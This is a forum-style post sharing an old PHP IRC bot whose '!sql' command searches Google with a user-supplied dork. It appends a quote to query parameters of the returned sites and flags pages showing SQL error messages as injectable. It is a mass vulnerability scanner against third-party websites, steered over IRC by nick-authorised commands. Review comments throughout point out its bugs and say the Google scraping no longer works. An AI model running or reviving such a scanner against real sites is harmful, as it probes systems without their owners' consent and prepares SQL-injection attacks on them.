Hey guys,
This script can only be used as a template for creating a PHP-based IRC Client/Bot; its vulnerability scanning functions are now useless.
This one comes from the Dark Ages of GRnet, enjoy 🙂
In any case, I do not take any responsibility for how the script runs or for whatever errors might pop up on your computer.
<?php
set_time_limit(0); // the receive loop below runs until the server drops us; lift the execution-time cap
/**
* @author Atlantean.
*/
//########################INFORMATION##################################
// --- IRC connection / identity ---------------------------------------
$server = 'global.irc.gr'; // IRC server host
$port = 6667;              // plaintext IRC port; nothing in this file negotiates TLS
$me = 'php_scanner';       // nick the bot registers with (and checks against on KICK)
$channel = '#scripting';   // channel joined at connect time and re-joined after a KICK
$identify = 'id';          // NOTE(review): assigned here but not referenced anywhere else in this file
$master = ['Atlantean'];   // nicks whose "!" commands are obeyed. The receive loop lowercases the
                           // incoming nick before a case-sensitive in_array(), so an entry with
                           // capitals never matches as written -- and a bare nick is not a credential.
//EDIT THIS
$max_results = 500; // upper bound on Google results walked per query
$threads = 10;      // URLs fetched concurrently per curl_multi batch
//#####################################################################
// Substrings looked for in fetched pages; any hit is reported as a "possible bug".
$search = [
    'mysql_num_rows()',
    'mysql_fetch_rows()',
    'main(',
    'extract()',
    'mysql_result()',
    'Syntax Error',
    'You Have An error',
    'mysql error',
    'SQL ERROR',
    'Warning: ',
];
//###############################SERVER WRITE##########################
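// Open a plaintext TCP connection to the IRC server; everything after this
// point talks to the network through $socket.
$socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
if ($socket === false)
{
    // socket_create() reports failure by returning false rather than throwing;
    // the original passed that false straight into socket_connect().
    echo "\n[-]Unable To create socket: " . socket_strerror(socket_last_error()) . "\n\n\n";
    exit(1);
}
if (!socket_connect($socket, $server, $port))
{
    echo "\n[-]Unable To connect...\n\n\n";
    // Surface the OS-level reason so a refused/unreachable host is diagnosable.
    echo "[-]" . socket_strerror(socket_last_error($socket)) . "\n";
    socket_close($socket);
    exit(1); // non-zero status: the bare exit; used before reported success to the shell
}
// IRC registration: USER, NICK, then JOIN. Lines are LF-terminated as in the
// original (RFC 2812 specifies CRLF; most servers tolerate bare LF). $me and
// $channel come from the config block above and are not validated here.
$registration = "USER php 127.0.0.1 PHP :PHP Bot\nNICK $me\nJOIN :$channel\n";
if (socket_write($socket, $registration) === false)
{
    echo "\n[-]Unable To register: " . socket_strerror(socket_last_error($socket)) . "\n\n\n";
    socket_close($socket);
    exit(1);
}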
//###############################Encode The Dork#############################
/**
 * Turn every byte of $s into a decimal HTML numeric entity ("&#NN;") and
 * URL-encode the concatenation, e.g. "a" -> "%26%2397%3B".
 *
 * Works byte-wise: a multi-byte UTF-8 character yields one entity per byte.
 * An empty string yields an empty string.
 *
 * @param string $s raw text
 * @return string urlencode()d entity string
 */
function encodeDork($s)
{
    $entities = array();
    $length = strlen($s);
    for ($offset = 0; $offset < $length; $offset++)
    {
        // ord() gives the same decimal value the hexdec(bin2hex()) pair did.
        $entities[] = '&#' . ord($s[$offset]) . ';';
    }
    return urlencode(implode('', $entities));
}
//###############################cURL MULTI THREAD#############################
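/**
 * Drive a curl_multi handle until every transfer added to it has completed.
 *
 * The original looped on curl_multi_exec() with no wait in between, which
 * spins a full CPU core for as long as any transfer is in flight. This
 * version blocks in curl_multi_select() between iterations and also stops
 * on a CURLM_* error instead of looping on it forever.
 *
 * @param resource|\CurlMultiHandle $curlHandle handle from curl_multi_init();
 *        by-reference only to keep the original signature
 * @return void
 */
function ExecHandle(&$curlHandle)
{
    $stillRunning = 0;
    do
    {
        $status = curl_multi_exec($curlHandle, $stillRunning);
        if ($status === CURLM_OK && $stillRunning > 0)
        {
            // Wait (up to 1s) for activity on any of the transfer sockets.
            // -1 means libcurl had nothing to wait on yet; back off briefly so
            // that case does not degrade into the old busy loop.
            if (curl_multi_select($curlHandle, 1.0) === -1)
            {
                usleep(1000);
            }
        }
    } while ($status === CURLM_CALL_MULTI_PERFORM
        || ($status === CURLM_OK && $stillRunning > 0));
}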
// Main receive loop. socket_read() returns at most 2048 bytes per call and
// nothing here reassembles IRC lines, so one $read may hold a partial line or
// several lines glued together; the parsing below assumes exactly one line.
// The loop ends when socket_read() returns false (error) or "" (peer closed).
while ($read = socket_read($socket, 2048))
{
// Naive split on spaces. For ":nick!user@host CMD target :text ..." this gives
// $cmd[0]=":nick!user@host", $cmd[1]="CMD", $cmd[2]=target, $cmd[3..]=text words.
$cmd = explode(" ", $read);
// Pull the sender nick out of the prefix. Prefix-less server lines such as
// "PING :token" have no ':' in $cmd[0], so $nick[1] is undefined here
// (undefined-index notice) and $nick ends up as "".
$nick = explode(':', $cmd[0]);
$nick = explode('!', $nick[1]);
$nick = strtolower($nick[0]);
switch ($cmd[1])
{
case "KICK":
// ":op!u@h KICK #chan victim :reason" -- rejoin when we were the victim.
// Loose == on two strings; === would be the safer spelling.
if ($cmd[3] == $me)
{
socket_write($socket, "\nJOIN :" . $channel . "\n");
}
break;
case "PRIVMSG":
// Authorisation is by nick alone. Two things to know before reusing this as a
// bot template: (1) $nick was lowercased above but in_array() compares strings
// case-sensitively, so the mixed-case entry in $master never matches and, as
// configured, no "!" command is ever accepted; (2) a nick is not a credential --
// on a network that does not enforce nick registration, whoever holds that nick
// controls the bot. Check the full user@host at minimum, or require a shared secret.
if (in_array($nick, $master))
{
// $cmd[3] is the first word of the message text (e.g. ":!join"); CR/LF left by
// the raw read are stripped so the case labels can match.
switch (str_replace(array(chr(10), chr(13)), '', $cmd[3]))
{
case ":!join":
// $cmd[4] goes into the protocol line verbatim. Unlike $cmd[3] it is not
// CR/LF-stripped, so any trailing bytes from the unframed read are sent with it.
socket_write($socket, "\nJOIN :" . $cmd[4] . "\n");
break;
case ":!exit":
// exit() receives socket_write()'s return value (bytes written, or false),
// so the process exit status is whatever that happened to be.
exit(socket_write($socket, "\nQUIT :Connection Lost\n"));
break;
case ":!part":
socket_write($socket, "\nPART :" . $cmd[4] . "\n");
break;
case ":!sql":
// Historical Google-dork scanner. Per the page header it no longer works (it
// scrapes a long-gone google.com result markup). Left verbatim and only
// annotated. Operator-facing hazard: the whole scan runs inline in this read
// loop, so no PING is answered until it finishes and the server's ping
// timeout can drop the connection mid-scan.
if (!isset($cmd[4]))
{
socket_write($socket, "\nPRIVMSG $channel :" . chr(3) . "4$nick " . chr(3) .
"12[-] Enter Dork!\r\n");
} else
{
socket_write($socket, "\nPRIVMSG $channel :" . chr(3) . "4$nick " . chr(3) .
"12[+] SQL Vulnerabilty Scan Started ...\nPRIVMSG $channel :" . chr(3) . "4$nick " .
chr(3) . "12[+] Dork : $cmd[4] \r\n");
$vuln_array = array();
// First page fetch, used only to read the result count and detect a block page.
$google = "http://www.google.com/search?q=" . encodeDork($cmd[4]) . "&start=0";
$ch = curl_init($google);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, 0);
$ret = curl_exec($ch);
curl_close($ch);
// $ret is false when curl_exec() failed; stristr() then sees "" and returns false.
// "!= false" is a loose comparison on a string-or-false result.
if (stristr($ret, '302 Moved') != false)
{
socket_write($socket, "\nPRIVMSG $channel :" . chr(3) . "4$nick " . chr(3) . "12[-] Banned From Google!! \r\n");
// break inside an if targets the innermost switch, i.e. this leaves the ":!sql"
// case, not the while loop.
break;
}
// Parse the "of about N" result count; $max[2][0] is undefined (notice, then "")
// when the markup does not match. Cap at $max_results.
preg_match_all("/of( about)* <b>([\d,]+)<\/b>/", $ret, $max);
$max = str_replace(",", "", $max[2][0]);
$max = $max > $max_results ? $max_results : $max;
$i = 0;
while ($i < $max)
{
$ch = curl_init("http://www.google.com/search?q=" . encodeDork($cmd[4]) . "&start=" . $i);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, 0);
$ret = curl_exec($ch);
preg_match_all("/<h3 class=r><a href=\"(.*?)\"/", $ret, $links);
// @ suppresses the undefined-index notice when the pattern matched nothing.
if (@$links[1])
{
foreach ($links[1] as $l)
{
// Keep only links that carry a query parameter. strpos() returns 0 for a '='
// at offset 0, which "!= false" treats as "not found"; "!== false" is the
// usual form.
if (strpos($l, '=') != false)
{
$url = explode('=', $l);
$url = $url[0] . "='";
if (!in_array($url, $vuln_array))
{
array_push($vuln_array, $url);
}
}
}
}
curl_close($ch);
// Intent: advance one result page (10) at a time. PHP footgun: when $max <= 10
// the false branch assigns the value returned by $i++ (the OLD value) back to
// $i, so $i never changes and this loop does not advance.
$i = $max > 10 ? $i += 10 : $i++;
}
// array_unique() returns a new array; the result is discarded here, so this
// line is a no-op (the in_array() check above already avoided duplicates).
array_unique($vuln_array);
sort($vuln_array);
socket_write($socket, "\nPRIVMSG $channel :" . chr(3) . "4$nick " . chr(3) . "12[+] Got " . count($vuln_array) . " Valid URLs! Injection Started...\r\n");
$p = 0;           // number of URLs whose page matched a $search string
$o = $threads;    // running "scanned" figure reported per batch (counts slots, not URLs)
$curlHandle = curl_multi_init();
// Batch loop: always takes $vuln_array[0 .. min($threads, count)-1], removes
// them afterwards, and relies on sort() reindexing so the next batch is again
// at index 0. $cURL and $source are created by assignment on each pass.
do
{
$tmp = count($vuln_array);
for ($i = 0; $i < $threads && $i < $tmp; $i++)
{
$cURL[$i] = curl_init($vuln_array[$i]);
curl_setopt($cURL[$i], CURLOPT_URL, $vuln_array[$i]);
curl_setopt($cURL[$i], CURLOPT_HEADER, 0);
curl_setopt($cURL[$i], CURLOPT_RETURNTRANSFER, true);
curl_multi_add_handle($curlHandle, $cURL[$i]);
}
ExecHandle($curlHandle);
for ($i = 0; $i < $threads && $i < $tmp; $i++)
{
$source[$i] = curl_multi_getcontent($cURL[$i]);
}
for ($i = 0; $i < $threads && $i < $tmp; $i++)
{
// First matching $search string wins; one report per URL at most.
foreach ($search as $error)
{
if (stristr($source[$i], $error) != false)
{
socket_write($socket, "\nPRIVMSG $channel :" . chr(3) . "4$nick " . chr(3) .
"12[+] Possible Bug Found: $vuln_array[$i]\n");
$p++;
break;
}
}
}
for ($i = 0; $i < $threads && $i < $tmp; $i++)
{
curl_multi_remove_handle($curlHandle, $cURL[$i]);
unset($vuln_array[$i]);
}
// sort() reindexes the remaining entries from 0.
sort($vuln_array);
socket_write($socket, "\nPRIVMSG $channel :" . chr(3) . "4$nick " . chr(3) .
"12[+] Scanned $o...\r\n");
$o += $threads;
unset($source);
unset($cURL);
} while (count($vuln_array) > 0);
curl_multi_close($curlHandle);
unset($vuln_array);
unset($source);
unset($cURL);
socket_write($socket, "\nPRIVMSG $channel :" . chr(3) . "4$nick " . chr(3) . "12[+] Done. $p Bugs Found.\r\n");
}
break;
}
}
break;
}
// Keep-alive: answered outside the switch because a PING line has no prefix.
// $cmd[1] is the ping token and most likely still carries the line's CR/LF
// from the raw read, so the extra "\n" appended here is probably redundant.
if ($cmd[0] == "PING")
{
socket_write($socket, "PONG " . $cmd[1] . "\n");
}
}
// Reached only when socket_read() returned false or "" (the ":!exit" path
// leaves via exit() above).
socket_close($socket);
?>